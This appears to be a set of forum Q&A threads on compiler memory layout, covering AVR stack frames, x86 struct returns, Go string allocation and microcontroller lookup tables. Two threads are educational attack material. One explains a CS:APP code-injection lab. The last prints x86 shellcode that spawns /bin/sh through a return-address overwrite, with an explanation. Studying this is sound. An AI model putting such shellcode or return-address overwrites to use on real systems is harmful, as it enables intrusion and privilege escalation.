AVR C compilers behavior. Memory management - c

Do AVR C compilers make program memorize the address in SRAM where function started to store its data (variables, arrays) in data stack in one of index registers in order to get absolute address of local variable by formula:
absoluteAdr = functionDataStartAdr + localShiftOfVariable.
And do they increase data stack point when variable declared by it's length or stack pointer increased in end/start of function for all it's variables lengths.

Let's have a look at avr-gcc, which is freely available including its ABI:
Do AVR C compilers make program memorize the address in SRAM where function started to store its data (variables, arrays) in data stack in one of index registers in order to get absolute address of local variable by formula:
Yes, no, it depends:
Static Storage
For variables in static storage, i.e. variables as defined by
unsigned char func (void)
{
static unsigned char var;
return ++var;
}
the compiler generates a symbol like var.123 with appropriate size (1 byte in this case). The linker / locator will then assign the address.
func:
lds r24,var.1505
subi r24,lo8(-(1))
sts var.1505,r24
ret
.local var.1505
.comm var.1505,1,1
Automatic
Automatic variables are held in registers if possible, otherwise the compiler allocates space in the frame of the function. It may even be the case that variables are optimized out, and in that case they do not exist anywhere in the program:
int add (void)
{
int a = 1;
int b = 2;
return a + b;
}
→
add:
ldi r24,lo8(3)
ldi r25,0
ret
There are 3 types of entities that are stored in the frame of a function, all of which might be present or absent depending on the program:
Callee-saved registers that are saved (PUSH'ed) by the function prologue and restored (POP'ed) by the epilogue. This is needed when local variables are allocated to callee-saved registers.
Space for local variables that cannot be allocated to registers. This happens when the variable is too big to be held in registers, there are too many auto variables, or the address of a variable is taken (and taking the address cannot be optimized out). This is because you cannot take the address of a register1.
void use_address (int*);
void func (void)
{
int a;
use_address (&a);
}
The space for these variables is allocated in the prologue and deallocated in the epilogue. Shrink-wrapping is not implemented:
func:
push r28
push r29
rcall .
in r28,__SP_L__
in r29,__SP_H__
/* prologue: function */
/* frame size = 2 */
/* stack size = 4 */
movw r24,r28
adiw r24,1
rcall use_address
pop __tmp_reg__
pop __tmp_reg__
pop r29
pop r28
ret
In this example, a occupies 2 bytes which are allocated by rcall . (it was compiled for a device with 16-bit program counter). Then the compiler initialized the frame-pointer Y (R29:R28) with the value of the stack pointer. This is needed because on AVR, you cannot access memory via SP; the only memory operations that involve SP are PUSH and POP. Then the address of that variable which is Y+1 is passed in R24. After the call of the function, the epilogue frees the frame and restores R28 and R29.
Arguments that have to be passed on the stack:
void xfunc (int, ...);
void call_xfunc (void)
{
xfunc (42);
}
These arguments are pushed and the callee is picking them up from the stack. These arguments are pushed / popped around the call, but can also be accumulated by means of -maccumulate-args.
call_func:
push __zero_reg__
ldi r24,lo8(42)
push r24
rcall xfunc
pop __tmp_reg__
pop __tmp_reg__
ret
In this example, the argument has to be passed on the stack because the ABI says that all arguments of a varargs function have to be passed on the stack, including the named ones.
For a description on how exactly the frame is being layed out and arguments are being passed, see [Frame Layout and Argument Passing] (https://gcc.gnu.org/wiki/avr-gcc#Frame_Layout).
1 Some AVRs actually allow this, but you never (like in NEVER) want to pass around the address of a general purpose register!

Compilers are not managing the RAM, compilers at compilation time calculate the required size for each data sections like bss, data, text, rodata, .. etc and generate relocatable object file for each translation unit
The linker comes after and generate one object file and assign the relocatable addresses to absolute ones mapped according to the Linker configuration File LCF.
In run time, the mechanism depends on the architecture itself. normally, each function call has a frame in the stack where it's arguments, return address and local variables are defined. the stack extend with a creation of variables and for low cost AVR microcontrollers, there is no memory management protection regarding the stack increase or the overlapping between the stack and another memory section -normally the heap-. even if there is OS managing the protection from the tasks to exceed its allocated stack, without a memory management unit, all what OS can do is to assert a RESET with illegal memory access reason.

Related

Why does the stack frame also store instructions(besides data)? What is the precise mechanism by which instructions on stack frame get executed?

Short version:
0: 48 c7 c7 ee 4f 37 45 mov $0x45374fee, %rdi
7: 68 60 18 40 00 pushq $0x401860
c: c3 retq
How can these 3 lines of instruction(0,7,c), saved in the stack frame, get executed? I thought stack frame only store data, does it also store instructions? I know data is read to registers, but how do these instructions get executed?
Long version:
I am self-studying 15-213(Computer Systems) from CMU. In the Attack lab, there is an instance (phase 2) where the stack frame gets overwritten with "attack" instructions. The attack happens by then overwriting the return address from the calling function getbuf() with the address %rsp points to, which I know is the top of the stack frame. In this case, the top of the stack frame is in turn injected with the attack code mentioned above.
Here is the question, by reading the book(CSAPP), I get the sense that the stack frame only stores data the is overflown from the registers(including return address, extra arguments, etc.). But I don't get why it can also store instructions(attack code) and be executed. How exactly did the content in the stack frame, which %rsp points to, get executed? I also know that %rsp stores the return address of the calling function, the point being it is an address, not an instruction? So exactly by which mechanism does an supposed address get executed as an instruction? I am very confused.
Edit: Here is a link to the question(4.2 level 2):
http://csapp.cs.cmu.edu/3e/attacklab.pdf
This is a post that is helpful for me in understanding: https://github.com/magna25/Attack-Lab/blob/master/Phase%202.md
Thanks for your explanation!
ret instruction gets a pointer from the current position of the stack and jumps to it. If, while in a function, you modify the stack to point to another function or piece of code that could be used maliciously, the code can return to it.
The code below doesn't necessarily compile, and it is just meant to represent the concept.
For example, we have two functions: add(), and badcode():
int add(int a, int b)
{
return a + b;
}
void badcode()
{
// Some very bad code
}
Let's also assume that we have a stack such as the below when we call add()
...
0x00....18 extra arguments
0x00....10 return address
0x00....08 saved RBP
0x00....00 local variables and etc.
...
If during the execution of add, we managed to change the return address to address of badcode(), on ret instruction we will automatically start executing badcode(). I don't know if this answer your question.
Edit:
An instruction is simply an array of numbers. Where you store them is irrelevant (mostly) to their execution. A stack is essentially an abstract data structure, it is not a special place in RAM. If your OS doesn't mark the stack as non-executable, there is nothing stopping the code on the stack from being returned to by the ret.
Edit 2:
I get the sense that the stack frame only stores data that is overflown
from the registers(including return address, extra arguments, etc.)
I do not think that you know how registers, RAM, stack, and programs are incorporated. The sense that stack frame only stores data that is overflown is incorrect.
Let's start over.
Registers are pieces of memory on your CPU. They are independent of RAM. There are mainly 8 registers on a CPU. a, c, d, b, si, di, sp, and bp. a is for accumulator and it generally used for arithmetic operations, likewise b stands for base, c stands for counter, d stands for data, si stands for source, di stands for destination, sp is the stack pointer, and bp is the base pointer.
On 16 bit computers a, b, c, d, si, di, sp, and bp are 16 bits (2 byte). The a, b, c, and d are often shown as ax, bx, cx, and dx where the x stands for extension from their original 8 bit versions. They can also be referred to as eax, ecx, edx, ebx, esi, edi, esp, ebp for 32 bit (e again stands for extended) and rax, rcx, rdx, rbx, rsi, rdi, rsp, rbp for 64 bit.
Once again these are on your CPU and are independent of RAM. CPU uses these registers to do everything that it does. You wanna add two numbers? put one of them inside ax and another one inside cx and add them.
You also have RAM. RAM (standing for Random Access Memory) is a storage device that allows you to access and modify all of its values using equal computation power or time (hence the term random access). Each value that RAM holds also has an address that determines where on the RAM this value is. CPU can use numbers and treat such numbers as addresses to access memory addresses of RAM. Numbers that are used for such purposes are called pointers.
A stack is an abstract data structure. It has a FILO (first in last out) structure which means that to access the first datum that you have stored you have to access all of the other data. To manipulate the stack CPU provides us with sp which holds the pointer to the current position of the stack, and bp which holds the top of the stack. The position that bp holds is called the top of the stack because the stack usually grows downwards meaning that if we start a stack from the memory address 0x100 and store 4 bytes in it, sp will now be at the memory address 0x100 - 4 = 0x9C. To do such operations automatically we have the push and pop instructions. In that sense a stack could be used to store any type of data regardless of the data's relation to registers are programs.
Programs are pieces of structured code that are placed on the RAM by the operating system. The operating system reads program headers and relevant information and sets up an environment for the program to run on. For each program a stack is set up, usually, some space for the heap is given, and instructions (which are the building blocks of a program) are placed in arbitrary memory locations that are either predetermined by the program itself or automatically given by the OS.
Over the years some conventions have been set to standardize CPUs. For example, on most CPU's ret instruction receives the system pointer size amount of data from the stack and jumps to it. Jumping means executing code at a particular RAM address. This is only a convention and has no relation to being overflown from registers and etc. For that reason when a function is called firstly the return address (or the current address in the program at the time of execution) is pushed onto the stack so that it could be retrieved later by ret. Local variables are also stored in the stack, along with arguments if a function has more than 6(?).
Does this help?
I know it is a long read but I couldn't be sure on what you know and what you don't know.
Yet Another Edit:
Lets also take a look at the code from the PDF:
void test()
{
int val;
val = getbuf();
printf("No exploit. Getbuf returned 0x%x\n", val);
}
Phase 2 involves injecting a small amount of code as part of your exploit string.
Within the file ctarget there is code for a function touch2 having the following C representation:
void touch2(unsigned val)
{
vlevel = 2; /* Part of validation protocol */
if (val == cookie) {
printf("Touch2!: You called touch2(0x%.8x)\n", val);
validate(2);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
fail(2);
}
exit(0);
}
Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case,
however, you must make it appear to touch2 as if you have passed your cookie as its argument.
Let's think about what you need to do:
You need to modify the stack of test() so that two things happen. The first thing is that you do not return to test() but you rather return to touch2. The other thing you need to do is give touch2 an argument which is your cookie. Since you are giving only one argument you don't need to modify the stack for the argument at all. The first argument is stored on rdi as a part of x86_64 calling convention.
The final code that you write has to change the return address to touch2()'s address and also call mov rdi, cookie
Edit:
I before talked about RAM being able to store data on addresses and CPU being able to interact with them. There is a secret register on your CPU that you are not able to reach from you assembly code. This register is called ip/eip/rip. It stands for instruction pointer. This register holds a 16/32/64 bit pointer to an address on RAM. this particular address is the address that the CPU will execute in its clock cycle. With that in my we can say that what a ret instruction is doing is
pop rip
which means get the last 64 bits (8 bytes for a pointer) on the stack into this instruction pointer. Once rip is set to this value, the CPU begins executing this code. The CPU doesn't do any checks on rip whatsoever. You can technically do the following thing (excuse me, my assembly is in intel syntax):
mov rax, str ; move the RAM address of "str" into rax
push rax ; push rax into stack
ret ; return to the last pushed qword (8 bytes) on the stack
str: db "Hello, world!", 0 ; define a string
This code can call/execute a string. Your CPU will be very upset tho, that there is no valid instruction there and will probably stop working.

How are oversized struct returned on the stack?

It is said that returning an oversized struct by value (as opposed to returning a pointer to the struct) from a function incurs unnecessary copy on the stack. By "oversized", I mean a struct that cannot fit in the return registers.
However, to quote Wikipedia
When an oversized struct return is needed, another pointer to a caller-provided space is prepended as the first argument, shifting all other arguments to the right by one place.
and
When returning struct/class, the calling code allocates space and passes a pointer to this space via a hidden parameter on the stack. The called function writes the return value to this address.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
If the function inlines, the copying through the return-value object can be fully optimized away. Otherwise, maybe not, and arg copying definitely can't be.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
It depends what the caller does with the return value,; if it's assigned to a provably private object (escape analysis), that object can be the return-value object, passed as the hidden pointer.
But if the caller actually wants to assign the return value to other memory, then it does need a temporary.
struct large retval = some_func(); // no extra copying at all
*p = some_func() // caller will make space for a local return-value object & copy.
(Unless the compiler knows that p is just pointing to a local struct large tmp;, and escape analysis can prove that there's no way some global variable could have a pointer to that same tmp var.)
long version, same thing with more details:
In the C abstract machine, there's a "return value object", and return foo copies the named variable foo to that object, even if it's a large struct. Or return (struct lg){1,2}; copies an anonymous struct. The return-value object itself is anonymous; nothing can take its address. (You can't int *p = &foo(123);). This makes it easier to optimize away.
In the caller, that anonymous return-value object can be assigned to whatever you want, which would be another copy if compilers didn't optimize anything. (All of this applies for any type, even int). Of course, compilers that aren't total garbage will avoid some, ideally all, of that copying, when doing so can't possibly change the observable results. And that depends on the design of the calling convention. As you say, most conventions, including all the mainstream x86 and x86-64 conventions, pass a "hidden pointer" arg for return values they choose not to return in register(s) for whatever reason (size, C++ having a non-trivial constructor).
struct large retval = foo(...);
For such calling conventions, the above code is effectively transformed to
struct large retval;
foo(&retval, ...);
So it's C return-value object actually is a local in the stack-frame of its caller. foo() is allowed to store into that return-value object whenever it wants during execution, including before reading some other objects. This allows optimization within the callee (foo) as well, so a struct large tmp = ... / return tmp can be optimized away to just store into the return-value object.
So there's zero extra copying when the caller does just want to assign the function return value to a newly declared local var. (Or to a local var which it can prove is still private, via escape analysis. i.e. not pointed-to by any global vars).
But what if the caller wants to store the return value somewhere else?
void caller2(struct large *lgp) {
*lgp = foo();
}
Can *lgp be the return-value object, or do we need to introduce a local temporary?
void caller2(struct large *lgp) {
// foo_asm(lgp); // nope, possibly unsafe
struct large retval; foo(&retval); *lgp = retval; // safe
}
If you want functions to be able to write large structs to arbitrary locations, you have to "sign off" on it by making that effect visible in your source.
What prevents the usage of a function argument as hidden pointer? for more details about why *lgp can't be the return-value object / hidden pointer, and another example. "A function is allowed to assume its return-value object (pointed-to by a hidden pointer) is not the same object as anything else". Also details of whether struct large *restrict lgp would make it safe: probably yes if the function doesn't longjmp (otherwise stores to the supposedly anonymous retval object might end up as visible side effects without return having been reached), but GCC doesn't look for that optimization.
Why is tailcall optimization not performed for types of class MEMORY? - return bar() where bar returns the same struct should be possible as an optimized tailcall, causing extra copying. This can even introduce extra copying of the whole struct, as well as failing to optimize call bar / ret into jmp bar.
how c compiler treats a struct return value from a function, in ASM - thresholds for returning in registers. e.g. i386 System V always returns structs in memory, even struct {int x;};.
Is it possible within a function to get the memory address of the variable initialized by the return value?
C/C++ returning struct by value under the hood an actual example (but unfortunately using debug-mode compiler-generated asm, so it contains copying that isn't necessary).
How do objects work in x86 at the assembly level? example at the bottom of how x86-64 System V packs the bytes of a struct into RDX:RAX, or just RAX if less than 8 bytes.
An example showing early stores to the return-value object (instead of copying)
(all source + asm on the Godbolt compiler explorer)
// more or less extra size will get compilers to copy it around with SSE2 or not
struct large { int first, second; char pad[0];};
int *global_ptr;
extern int a;
NOINLINE // __attribute__((noinline))
struct large foo() {
struct large tmp = {1,2};
if (a)
tmp.second = *global_ptr;
return tmp;
}
(targeting GNU/Linux) clang -m32 -O3 -mregparm=1 creates an implementation that writes its return-value object before it's done reading everything else, exactly the case that would make it unsafe for the caller to pass a pointer to some globally-reachable memory.
The asm makes it clear that tmp is fully optimized away, or is the retval object.
# clang -O3 -m32 -mregparm=1
foo:
mov dword ptr [eax + 4], 2
mov dword ptr [eax], 1 # store tmp into the retval object
cmp dword ptr [a], 0
je .LBB0_2 # if (a == 0) goto ret
mov ecx, dword ptr [global_ptr] # load the global
mov ecx, dword ptr [ecx] # deref it
mov dword ptr [eax + 4], ecx # and store to the retval object
.LBB0_2:
ret
(-mregparm=1 means pass the first arg in EAX, less noisy and easier to quickly visually distinguish from stack space than passing on the stack. Fun fact: i386 Linux compiles the kernel with -mregparm=3. But fun fact #2: if a hidden pointer is passed on the stack (i.e. no regparm), that arg is callee pops, unlike the rest. The function will use ret 4 to do ESP+=4 after popping the return address into EIP.)
In a simple caller, the compiler just reserves some stack space, passes a pointer to it, and then can load member variables from that space.
int caller() {
struct large lg = {4, 5}; // initializer is dead, foo can't read its retval object
lg = foo();
return lg.second;
}
caller:
sub esp, 12
mov eax, esp
call foo
mov eax, dword ptr [esp + 4]
add esp, 12
ret
But with a less trivial caller:
int caller() {
struct large lg = {4, 5};
global_ptr = &lg.first;
// unknown(&lg); // or this: as a side effect, might set global_ptr = &tmp->first;
lg = foo(); // (except by inlining) the compiler can't know if foo() looks at global_ptr
return lg.second;
}
caller:
sub esp, 28 # reserve space for 2 structs, and alignment
mov dword ptr [esp + 12], 5
mov dword ptr [esp + 8], 4 # materialize lg
lea eax, [esp + 8]
mov dword ptr [global_ptr], eax # point global_ptr at it
lea eax, [esp + 16] # hidden first arg *not* pointing to lg
call foo
mov eax, dword ptr [esp + 20] # reload from the retval object
add esp, 28
ret
Extra copying with *lgp = foo();
int caller2(struct large *lgp) {
global_ptr = &lgp->first;
*lgp = foo();
return lgp->second;
}
# with GCC11.1 this time, SSE2 8-byte copying unlike clang
caller2: # incoming arg: struct large *lgp in EAX
push ebx #
mov ebx, eax # lgp, tmp89 # lgp needed after foo returns
sub esp, 24 # reserve space for a retval object (and waste 16 bytes)
mov DWORD PTR global_ptr, eax # global_ptr, lgp
lea eax, [esp+8] # hidden pointer to the retval object
call foo #
movq xmm0, QWORD PTR [esp+8] # 8-byte copy of both halves
movq QWORD PTR [ebx], xmm0 # *lgp_2(D), tmp86
mov eax, DWORD PTR [ebx+4] # lgp_2(D)->second, lgp_2(D)->second # reload int return value
add esp, 24
pop ebx
ret
The copy to *lgp needs to happen, but it's somewhat of a missed optimization to reload from there, instead of from [esp+12]. (Saves a byte of code size at the cost of more latency.)
Clang does the copy with two 4-byte integer register mov loads/stores, but one of them is into EAX so it already has the return value ready.
You might also want to look at the result of assigning to memory freshly allocated with malloc. Compilers know that nothing else can (legally) be pointing to the newly allocated memory: that would be use-after-free undefined behaviour. So they may allow passing on a pointer from malloc as the return-value object if it hasn't been passed to anything else yet.
Related fun fact: passing large structs by value always requires a copy (if the function doesn't inline). But as discussed in comments, the details depend on the calling convention. Windows differs from i386 / x86-64 System V calling conventions (all non-Windows OSes) on this:
SysV calling conventions copy the whole struct to the stack. (if they're too large to fit in a pair of registers for x86-64)
Windows x64 makes a copy and passes (like a normal arg) a pointer to that copy. The callee "owns" the arg and can modify it, so a tmp copy is still needed. (And no, const struct large foo has no effect.)
https://godbolt.org/z/ThMrE9rqT shows x86-64 GCC targeting Linux vs. x64 MSVC targeting Windows.
This really depends on your compiler, but in general the way this works is that the caller allocates the memory for the struct return value, but the callee also allocates stack space for any intermediate value of that structure. This intermediate allocation is used when the function is running, and then the struct is copied onto the caller's memory when the function returns.
For reference as to why your solution won't always work, consider a program which has two of the same struct and returns one based on some condition:
large_t returntype(int condition) {
large_t var1 = {5};
large_t var2 = {6};
// More intermediate code here
if(condition) return var1;
else return var2;
}
In this case, both may be required by the intermediate code, but the return value is not known at compile time, so the compiler doesn't know which to initialize on the caller's stack space. It's easier to just keep it local and copy on return.
EDIT: Your solution may be the case in simple functions, but it really depends on the optimizations performed by each individual compiler. If you're really interested in this, check out https://godbolt.org/

How garbage collection works with data segment?

For below Go syntax in function scope f():
var fruits [5]string
fruits[0] = "Apple"
Below is the memory representation:
My understanding is, string Apple gets stored in data segment and rest of the six string headers(ptr,length) gets allocated in stack segment.
For below code in function scope f():
numbers := [4]int{10, 20, 30, 40}
Memory for {10, 20, 30, 40} gets allocated in data segment but not in stack segment for function scope f.
Go garbage collector cleans heap segment of a process.
Returning from function f(), stack segment pointer clears stack segment of function f()
Edit:
To understand, value semantics & pointer semantics in the aspect of allocating strings,
How data segment memory(for string Apple) gets cleared after returning from function f?
The language definition for Go does not describe actions in terms of segments, stacks, heaps, and so on. So all of this is implementation detail, which might change from one Go implementation to another.
In general, though, Go compilers do live-range analysis for variables and use escape analysis to determine whether to allocate something in GC-able memory ("heap") or automatically-released storage ("stack"). String literals may, depending on too many things to count, be allocated at compile time as text and referenced directly from there, or copied to some data area that's either heap-ish or stack-ish.
Let's assume for argument's sake that you wrote:
func f() {
var fruits [5]string
fruits[0] = "Apple"
}
This function doesn't do anything at all, so it just gets elided from the build.
The string constant "Apple" appears nowhere at all. Let's add a bit more so that it actually does exist:
package main
import "fmt"
func f() {
var fruits [5]string
fruits[0] = "Apple"
fmt.Println(fruits[0])
}
func main() {
f()
fmt.Println("foo")
}
Here is some (hand-trimmed / cleaned-up) disassembly of main.f in the resulting binary. Note that the implementation will almost certainly be different in other versions of Go. This was built with Go 1.13.5 (for amd64).
main.f:
mov %fs:0xfffffffffffffff8,%rcx
cmp 0x10(%rcx),%rsp
jbe 2f
Everything up to here is boilerplate: the entry point for the function checks whether it needs to call the runtime to allocate more stack space, because it's about to use 0x58 bytes of stack space here:
1: sub $0x58,%rsp
mov %rbp,0x50(%rsp)
This is the end of the boilerplate: after the next few instructions, we will be able to return from f with a simple retq. Now we make room on the stack for the array fruits, plus other space the compiler deems appropriate for whatever reason, and update %rbp. Then we store a string header at %(rsp) and %8%(rsp) in order to call convTstring in package runtime:
lea 0x50(%rsp),%rbp
lea 0x35305(%rip),%rax # <go.string.*+0x24d> - the string is here
mov %rax,(%rsp)
movq $0x5,0x8(%rsp) # this is the length of the string
callq 408da0 <runtime.convTstring>
mov 0x10(%rsp),%rax
The function runtime.convTstring actually allocates space (16 bytes on this machine) for another copy of the string header, on "the heap", then copies the header into place. This copy is now ready to be stored into fruits[0] or elsewhere. The calling convention for Go on x86_64 is a bit odd, so the return value is at 0x10(%rsp), which we've now copied into %rax. We'll see where this gets used in a moment:
xorps %xmm0,%xmm0
movups %xmm0,0x40(%rsp)
These instructions zero out 16 bytes starting at 0x40(%rsp). It's not clear to me what this is for, especially since we overwrite them immediately.
lea 0x11a92(%rip),%rcx # <type.*+0x11140>
mov %rcx,0x40(%rsp)
mov %rax,0x48(%rsp)
mov 0xd04a1(%rip),%rax # <os.Stdout>
lea 0x4defa(%rip),%rcx # <go.itab.*os.File,io.Writer>
mov %rcx,(%rsp)
mov %rax,0x8(%rsp)
lea 0x40(%rsp),%rax
mov %rax,0x10(%rsp)
movq $0x1,0x18(%rsp)
movq $0x1,0x20(%rsp)
callq <fmt.Fprintln>
This appears to be the call to fmt.Println: since we pass an interface value, we must package it up as a type and pointer-to-value (perhaps that's why there is a call to runtime.convTstring in the first place). We also have os.stdout and its interface descriptor inserted directly into the call here, via some inlining (note that this call goes directly to fmt.Fprintln).
In any case, we passed the string header, allocated in runtime.convTstring here, to function fmt.Println.
mov 0x50(%rsp),%rbp
add $0x58,%rsp
retq
2: callq <runtime.morestack_noctxt>
jmpq 1b
This is how we return from a function—the constants 0x50 and 0x58 depend on how much stack space we allocated—and, after the label that the start of the function can jump to, the rest of the function-entry boilerplate.
Anyway, the point of all of the above is to show that:
The five byte sequence Apple is not allocated at runtime at all. Instead, it exists in the rodata segment known as go.string.*. This rodata segment is in effect program text: the OS places it into read-only memory, if at all possible. It's just separated from the executable instructions for organizational purposes.
The fruits array never actually got used at all. The compiler could see that, while we wrote to it, we didn't use it other than the one call, so we didn't need it after all.
But a string header, by which one can find both the length of the string and the data (in that rodata segment), did get heap-allocated.
It didn't need to be, as fmt.Println is not going to save this pointer, but the compiler didn't spot that. Eventually, the runtime gc will free the heap-allocated string header data, unless the program exits entirely first.
Memory for {10, 20, 30, 40} gets allocated in data segment but not in
stack segment for function scope f.
No, it's still gonna be allocated on the stack. [4]int is an array type. It's a value type. int is a value type. So the whole array would be on the stack, GC wouldn't need to deal with it.
But if something is allocated on the heap (I guess that what you mean by data segment) then the GC would kick in. The internals are an implementation detail and may change in the future but to put it simply current version would just start from roots (global variables, stack, registers) and mark all the live objects. Everything that's unmarked would be collected.
Edit:
If we're talking about string literals in particular. Strings work similar to slices - it's a value type, struct with two fields - pointer to the backing array of bytes and a length. String literals are special, they actually point to read-only data segment that contains actual string contents. So at runtime no allocation occurs and GC has nothing to collect.

static const vs const declaration performance difference on uC

Lets say i have a lookuptable, an array of 256 elements defined and declared in a header named lut.h. The array will be accessed multiple times in lifetime of the program.
From my understanding if its defined & declared as static, it will remain in memory until the program is done, i.e. if it is a task running on a uC, the array is in memory the entire time.
Where as without static, it will be loaded into memory when accessed.
In lut.h
static const float array[256] = {1.342, 14.21, 42.312, ...}
vs.
const float array[256] = {1.342, 14.21, 42.312, ...}
Considering the uC has limited spiflash and psram, what would be the most performance oriented approach?
You have some misconceptions here, since a MCU is not a PC. Everything in memory in a MCU will persist for as long as the MCU has power. Programs do not end or return resources to a hosting OS.
"Tasks" on a MCU means you have a RTOS. They use their own stack and that's a topic of it's own, quite unrelated to your question. It is normal that all tasks on a RTOS execute forever, rather than getting allocated/deallocated in run-time like processes in a PC.
static versus automatic on local scope does mean different RAM memory use, but not necessarily more/less memory use. Local variables get pushed/popped on the stack as the program executes. static ones sit on their designated address.
Where as without static, it will be loaded into memory when accessed.
Only if the array you are loading into is declared locally. That is:
void func (void)
{
int my_local_array[] = {1,2,3};
...
}
Here my_local_array will load the values from flash to RAM during execution of that function only. This means two things:
The actual copy down from flash to RAM is slow. First of all, copying something is always slow, regardless of the situation. But in the specific case of copying from RAM to flash, it might be extra slow, depending on MCU.
It will be extra slow on high end MCUs with flash wait states that fail to utilize data cache for the copy. It will be extra slow on weird Harvard architecture MCUs that can't address data directly. Etc.
So naturally if you do this copy down each time a function is called, instead of just once, your program will turn much slower.
Large local objects lead to a need for higher stack size. The stack must be large enough to deal with the worst-case scenario. If you have large local objects, the stack size will need to be set much higher to prevent stack overflows. Meaning this can actually lead to less effective memory use.
So it isn't trivial to tell if you save or lose memory by making an object local.
General good practice design in embedded systems programming is to not allocate large objects on the stack, as they make stack handling much more detailed and the potential for stack overflow increases. Such objects should be declared as static, at file scope. Particularly if speed is important.
static const float array vs const float array
Another misconception here. Making something const in MCU system, while at the same time placing it at file scope ("global"), most likely means that the variable will end up in flash ROM, not in RAM. Regardless of static.
This is most of the time preferred, since in general RAM is a more valuable resource than flash. The role static plays here is merely good program design, as it limits access to the variable to the local translation unit, rather than cluttering up the global namespace.
In lut.h
You should never define variables in header files.
It is bad from a program design point-of-view, as you expose the variable all over the place ("spaghetti programming") and it is bad from a linker point of view, if multiple source files include the same header file - which is extremely likely.
Correctly designed programs places the variable in the .c file and limits access by declaring it static. Access from the outside, if needed, is done through setters/getters.
he uC has limited spiflash
What is "spiflash"? An external serial flash memory accessed through SPI? Then none of this makes sense, since such flash memory isn't memory-mapped and typically the compiler can't utilize it. Access to such memories has to be carried out by your application, manually.
If your arrays are defined on a file level (you mentioned lut.h), and both have const qualifiers, they will not be loaded into RAM¹. The static keyword only limits the scope of the array, it doesn't change its lifetime in any way. If you check the assembly for your code, you will see that both arrays look exactly the same when compiled:
static const int static_array[] = { 1, 2, 3 };
const int extern_array[] = { 1, 2, 3};
extern void do_something(const int * a);
int main(void)
{
do_something(static_array);
do_something(extern_array);
return 0;
}
Resulting assembly:
main:
sub rsp, 8
mov edi, OFFSET FLAT:static_array
call do_something
mov edi, OFFSET FLAT:extern_array
call do_something
xor eax, eax
add rsp, 8
ret
extern_array:
.long 1
.long 2
.long 3
static_array:
.long 1
.long 2
.long 3
On the other hand, if if you declare the arrays inside a function, then the array will be copied to temporary storage (stack) for the duration of the function, unless you add the static qualifier:
extern void do_something(const int * a);
int main(void)
{
static const int static_local_array[] = { 1, 2, 3 };
const int local_array[] = { 1, 2, 3 };
do_something(static_local_array);
do_something(local_array);
return 0;
}
Resulting assembly:
main:
sub rsp, 24
mov edi, OFFSET FLAT:static_local_array
movabs rax, 8589934593
mov QWORD PTR [rsp+4], rax
mov DWORD PTR [rsp+12], 3
call do_something
lea rdi, [rsp+4]
call do_something
xor eax, eax
add rsp, 24
ret
static_local_array:
.long 1
.long 2
.long 3
¹ More precisely, it depends on the compiler. Some compilers will need additional custom attributes to define exactly where you want to store the data. Some compilers will try to place the array into RAM when there is enough spare space, to allow faster reading.

can anyone explain this code to me?

WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //setret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
can anyone give me a better explanation ?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.
2) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
Now I assume the following stack layout for your program:
+-------------------------+
| function arguments | |
| (e.g. argv, argc) | | (note: the stack
+-------------------------+ <-- ss:esp + 12 | grows downward!)
| return address | |
+-------------------------+ <-- ss:esp + 8 V
| saved ebp register |
+-------------------------+ <-- ss:esp + 4 / ss:ebp - 0 (see code below)
| local variable (ret) |
+-------------------------+ <-- ss:esp + 0 / ss:ebp - 4
At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
